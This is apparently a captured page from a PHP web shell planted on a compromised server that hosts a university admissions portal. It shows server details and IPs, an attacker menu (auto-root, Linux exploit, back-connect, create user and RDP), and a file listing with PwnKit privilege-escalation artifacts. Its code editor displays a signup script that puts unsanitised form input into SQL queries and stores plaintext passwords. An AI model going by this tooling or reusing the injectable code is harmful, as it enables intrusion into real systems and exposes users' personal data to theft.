Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.17.185.204
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
pgetadm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.pgetadm.php
3.61
KB
-rw-r--r--
PrintAdmissionOrderstudent.php
9.83
KB
-rwxrwxrwx
Seat_Allotment_Details.php
11.36
KB
-rw-r--r--
add-course.php
5.63
KB
-rwxrwxrwx
admfee.php
9.25
KB
-rw-rw-r--
admissionorderPGReport.php
15.91
KB
-rwxrwxrwx
admissionordertest.php
356
B
-rwxrwxrwx
admorder_bnu.php
14.93
KB
-rw-r--r--
app-status.php
2.39
KB
-rwxrwxrwx
applicationFormPGReport.php
43.11
KB
-rwxrwxrwx
bcuapplicationFormPGReport.php
35.13
KB
-rwxrwxrwx
bnuapplicationFormPGReport.php
35.47
KB
-rwxrwxrwx
category.php
2.52
KB
-rwxrwxrwx
data.json
1.98
KB
-rwxrwxrwx
degree.php
12.38
KB
-rwxrwxrwx
feestr.php
5.92
KB
-rwxrwxrwx
forgot-password.php
2.77
KB
-rw-rw-r--
forgot-password_old.php
2.31
KB
-rwxrwxrwx
getSavedData.php
8.49
KB
-rwxrwxrwx
getSavedData_old_12102019.php
5
KB
-rwxrwxrwx
hallticket.php
7.61
KB
-rwxrwxrwx
login.php
947
B
-rwxrwxrwx
logout.php
44
B
-rwxrwxrwx
option-entry.php
4.34
KB
-rwxrwxrwx
option-entryPrint.php
9.29
KB
-rwxrwxrwx
printadmissionorder.php
616
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
reprint.php
707
B
-rwxrwxrwx
resetpassword.php
700
B
-rwxrwxrwx
saveApplication.php
25.7
KB
-rwxrwxrwx
saveApplication051120.php
23.67
KB
-rwxrwxrwx
saveApplication_old_12102019.p...
14.67
KB
-rwxrwxrwx
seat-allot.php
1008
B
-rwxrwxrwx
sendGridMail.php
1.28
KB
-rwxrwxrwx
sendMobEmailOTP.php
1.41
KB
-rwxrwxrwx
sendsmsapi.php
760
B
-rwxrwxrwx
signin.php
996
B
-rwxrwxrwx
signup.php
1.01
KB
-rwxrwxrwx
validateRegno.php
1.94
KB
-rwxrwxrwx
vkuapplicationFormPGReport cop...
36.61
KB
-rwxrwxrwx
vkuapplicationFormPGReport.php
37.97
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signup.php
<?php include ("../database.php"); error_reporting(E_ALL); ini_set('display_errors', 'on'); $mobile = trim($_POST['mobile']); $email = trim($_POST['email']); $name = trim($_POST['name']); $mobileotp = trim($_POST['motp']); $dob = trim($_POST['dob']);//password $passwd = trim($_POST['password']); //and fmobileotp = '3313' $query = "SELECT * from collstud where fmobileno = '{$mobile}' and fmobileotp = '{$mobileotp}' and ROUND(time_to_sec((TIMEDIFF(NOW(), fmobotptime))) / 60) <= 10"; // var_dump($query); $result = mysqli_query($conn,$query); $row = mysqli_fetch_assoc($result); $count = mysqli_num_rows($result); if($count >0) { $query = "update collstud set fmobilevalid = 'T', factive = 'T', fdob = '{$dob}', fpasswd ='{$passwd}', fname = '{$name}', femail = '{$email}' where fmobileno = '{$mobile}'"; $result = mysqli_query($conn,$query); if($result == 1) { $arr["status"] = 'success'; } else { $arr["status"] = 'error'; } } else { $arr["status"] = 'invalid'; } echo json_encode($arr); ?>
Close